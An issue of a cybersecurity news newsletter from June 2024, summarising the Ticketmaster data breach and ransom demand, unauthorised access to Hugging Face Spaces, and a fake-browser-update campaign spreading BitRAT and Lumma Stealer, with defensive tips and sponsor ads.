ShinyHunters demands $500,000 for Ticketmaster hack

Jun 03 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s blasting off like #Starlink πŸš€πŸš€πŸš€

Today’s hottest cybersecurity news stories:

  • 🎫 Ticketmaster hacked again! 560m affected. $500k demanded πŸ’°

  • πŸ€— Hugging Face detects unauthorised access to Spaces platform πŸš‰

  • ⚠️ Beware of fake browser update delivering BitRAT, Lumma Stealer πŸ€

Ticketmaster? Hackers nick it faster πŸ™ƒπŸ™ƒπŸ™ƒ

🚨 Ticketmaster Hack Exposes 560 Million Customers' Data! πŸ—ƒοΈ

Live Nation, Ticketmaster’s owner, confirmed "unauthorised activity" on its database after hackers claimed to have stolen personal details of 560 million customers. The hacking group ShinyHunters demands a $500,000 ransom to prevent selling the data. πŸ’°

What Was Stolen? 🀏

The stolen data includes:

  • Names

  • Addresses

  • Phone numbers

  • Partial credit card details πŸ’³

  • Investigation Underway

Live Nation revealed in a filing to the SEC that a criminal threat actor offered the data for sale on the dark web on May 27. The exact number of affected customers remains unconfirmed. πŸ”

Global Impact 🌎

The Australian government and the FBI are involved in addressing the breach. Live Nation is working to mitigate risks and notify users about the unauthorised access. 🌐

Linked Hacks πŸ”—

This breach may be connected to a larger hacking campaign. Santander recently confirmed a related data breach affecting 30 million customers. Data samples have been posted on BreachForums, a dark web hacking forum. πŸ’»

ShinyHunters' HistoryΒ πŸ“œ

ShinyHunters has a notorious past, including a breach of 70 million AT&T customers in 2021 and 200,000 Pizza Hut customers in Australia last year. Despite the FBI’s crackdown in March 2023, the group remains active. 🚨

Past Security Issues πŸ“…

Ticketmaster has faced security issues before, including a $10 million fine in 2020 for hacking a competitor and a cyber attack in November affecting Taylor Swift's Era's tour ticket sales. 🎟️

Top Tips πŸ›‘οΈ

If you’re worried you may be affected:

  • Be alert for suspicious emails, messages, and calls.

  • Avoid sharing information with scammers exploiting the breach.

  • Β Watch out for messages about password resets, compensation, or missed deliveries.

  • Monitor your financial accounts for suspicious activity.

  • Change your Ticketmaster password and any other sites using the same password. πŸ”

Stay safe and vigilant as this situation unfolds!

Learn how to scale your GRC program with automation and AI

Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.

  • Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring

  • Centralize risk and report on program impact to internal teams

  • Create your own Trust Center to proactively manage buyer needs

  • Leverage AI to answer security questionnaires faster

Join Vanta’s webinar on June 11 to learn more about scaling your GRC program with automation and AI.

Register to save your spot.

Hugging egg on Face? πŸ‘€πŸ³πŸ™ˆ

🚨 Hugging Face Security Breach Exposes AI Platform! πŸ€–

AI company Hugging Face revealed unauthorised access to its Spaces platform. Suspicions arise that a subset of Spaces' secrets may have been accessed without authorization. πŸ”

What is Spaces? 🌐

Spaces allows users to create, host, and share AI and machine learning applications. It also serves as a discovery service for AI apps made by others on the platform. 🧠

Immediate Response πŸ—£οΈ

Hugging Face is revoking compromised HF tokens and notifying affected users via email. They recommend refreshing keys or tokens and switching to fine-grained access tokens, which are now the default. πŸ”

Impact and Investigation πŸ’₯

The number of impacted users remains undisclosed. The incident is under investigation, and law enforcement and data protection authorities have been alerted. 🚨

AI Sector Under Attack 🎯

The rapid growth of AI has made AI-as-a-service providers like Hugging Face prime targets for attackers. In early April, cloud security firm Wiz highlighted potential vulnerabilities in Hugging Face, including cross-tenant access and AI/ML model poisoning risks. πŸ”’

Previous Security Concerns ⚠️

Research by HiddenLayer identified flaws in Hugging Face's Safetensors conversion service, enabling hijacking of AI models for supply chain attacks. Malicious actors compromising Hugging Face could access private AI models, datasets, and critical applications, posing significant risks. ⚠️

Stay Secure πŸ›‘οΈ

Hugging Face users should update their tokens and stay vigilant against potential security threats. This breach underscores the importance of robust security measures in the growing AI sector. 🌐

Don’t get Bit by a RAT πŸ€πŸ€πŸ€

🚨 Fake Browser Updates Delivering RATs and Info Stealers! πŸ€

Cybersecurity firm eSentire has identified a new wave of cyberattacks using fake browser updates to distribute remote access trojans (RATs) and information-stealing malware such as BitRAT and Lumma Stealer (aka LummaC2). πŸ”

The Attack Chain πŸ”—

  • Initial Contact: Victims are lured to a compromised website with JavaScript that redirects them to a fake browser update page ("chatgpt-app[.]cloud").

  • Download: The page prompts an automatic download of a ZIP archive file ("Update.zip") hosted on Discord.

  • Execution: Inside the ZIP file, a JavaScript file ("Update.js") executes PowerShell scripts to fetch additional payloads disguised as PNG images from a remote server.

PowerShell Payloads 🐚

The PowerShell scripts not only ensure persistence but also deploy a .NET-based loader used to deliver final-stage malware, including BitRAT and Lumma Stealer.

BitRAT: A versatile RAT capable of data theft, cryptocurrency mining, and remote control.

Lumma Stealer: A commercial information stealer that extracts data from web browsers, crypto wallets, and more, available for $250 to $1,000 per month since August 2022.

Why This Tactic Works β™ŸοΈ

The fake browser update lure is effective because it leverages the trust associated with well-known software updates, maximising the reach and impact of the attack. This method has been commonly used to distribute various types of malware, including the notorious SocGholish malware. πŸ•΅οΈβ€β™‚οΈ

Broader Threat Landscape 🏞️

ClearFake Campaign: A new variant discovered by ReliaQuest involves tricking users into executing malicious PowerShell code by claiming a browser display issue and instructing them to install a root certificate.

Webhard Distribution: The AhnLab Security Intelligence Center (ASEC) reported campaigns using webhards to distribute malicious installers for adult games and cracked software, leading to malware like Orcus RAT and XMRig miner.

Impact and Prevalence πŸ’₯

Lumma Stealer has become one of the most prevalent info stealers, with a significant increase in logs for sale on cybercrime forums. The malware’s effectiveness lies in its ability to infiltrate systems and exfiltrate data undetected.

Additional Findings 🧐

CryptoChameleon: Silent Push highlighted CryptoChameleon’s use of DNSPod[.]com nameservers for fast flux evasion techniques, allowing quick cycling of IPs linked to a single domain name, complicating traditional countermeasures.

Top Tips πŸ›‘οΈ

  • Be Wary of Fake Updates: Always verify the source of any software update prompt.

  • Monitor PowerShell Activity: Keep an eye on unexpected PowerShell executions.

  • Use Security Software: Employ robust antivirus and anti-malware tools.

  • Stay Informed: Keep up with cybersecurity news and updates to be aware of emerging threats.

By staying vigilant and informed, individuals and organisations can better protect themselves against these sophisticated and evolving cyber threats. 🌐

πŸ—žοΈ Extra, Extra! Read all about it! πŸ—žοΈ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • πŸ›‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday πŸ“…

  • πŸ’΅Β Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for πŸ†“

  • πŸ“ˆΒ Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πŸ‘Ύ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles